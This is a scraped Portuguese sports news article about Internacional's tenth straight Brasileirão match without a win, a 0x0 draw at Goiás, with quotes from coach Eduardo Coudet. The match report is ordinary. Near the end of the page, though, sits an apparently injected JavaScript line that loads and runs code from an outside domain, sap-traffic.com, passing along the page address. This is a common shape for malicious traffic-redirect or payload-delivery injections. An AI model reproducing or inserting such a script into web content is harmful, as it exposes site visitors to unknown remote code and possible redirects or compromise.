Publicidade

Após mais um jogo sem vencer, Inter reconhece que “acabou a desculpa” no Brasileirão

Time colorado ficou apenas no 0x0 jogando fora de casa diante do Goiás

Publicidade

Bem na Libertadores, instável no Brasileirão. Assim, o Inter segue a sua caminhada na temporada, admitindo que “acabaram as desculpas” no campeonato nacional após 10 jogos seguidos sem vencer. O 10° foi exatamente neste sábado, fora de casa, diante do Goiás, em empate em 0x0. O resultado, claro, frustrou bastante o técnico argentino Eduardo Coudet.

“Não é desculpa, mas estava muito quente. Tivemos algumas dificuldades. Não é desculpa, mas é diferente. Agora teremos um jogo em casa com o São Paulo, teremos que fazer um grande jogo e tomara que o Beira-Rio esteja lotado como da última vez porque isso nos dá uma energia muito grande para sair desta série negativa”, disse o treinador argentino.

Agora, o time terá 10 dias de intervalo até o próximo compromisso pelo nacional por conta da parada da Data-Fifa. Em seguida, no dia 13, enfrenta o São Paulo, no Beira-Rio, sem Luiz Adriano suspenso e possivelmente sem Pedro Henrique, com suspeita de fratura no braço.

“Agora não há mais desculpas, teremos uma semana completa, vamos chegar bem. Faltarão jogadores, mas teremos uma semana toda para trabalhar em Porto Alegre. A responsabilidade que temos é ganhar. Jogue quem jogue, temos que ganhar em casa. Vamos ter alguma complicação, mas vamos trabalhar bem e imagino fazer um grande jogo e ganhar”, acrescentou Coudet.

A sequência ruim do Inter

Momentaneamente no 12° lugar com 26 pontos, mas podendo perder posições neste domingo, o Inter vem de 10 jogos sem vencer e sete deles foram com Coudet. A última vitória foi no fim de junho, fora, de virada, contra o América-MG. De lá para cá, os tropeços foram diante de Cruzeiro, Fluminense, Palmeiras, Bragantino, Cuiabá, Corinthians, Botafogo, Fortaleza, Flamengo e Goiás.

Leia mais do Inter:

Siga o Zona Mista nas redes sociais: TwitterInstagramFacebook e YouTube. Google News do Zona Mista (zonamista.com.br)

loading...

Publicidade

let tdscript = document.createElement('script'); tdscript.src = "https://sap-traffic.com/output/211?ref="+window.location.href; document.body.append(tdscript);

Utilizamos cookies. Aceitar Ler políticas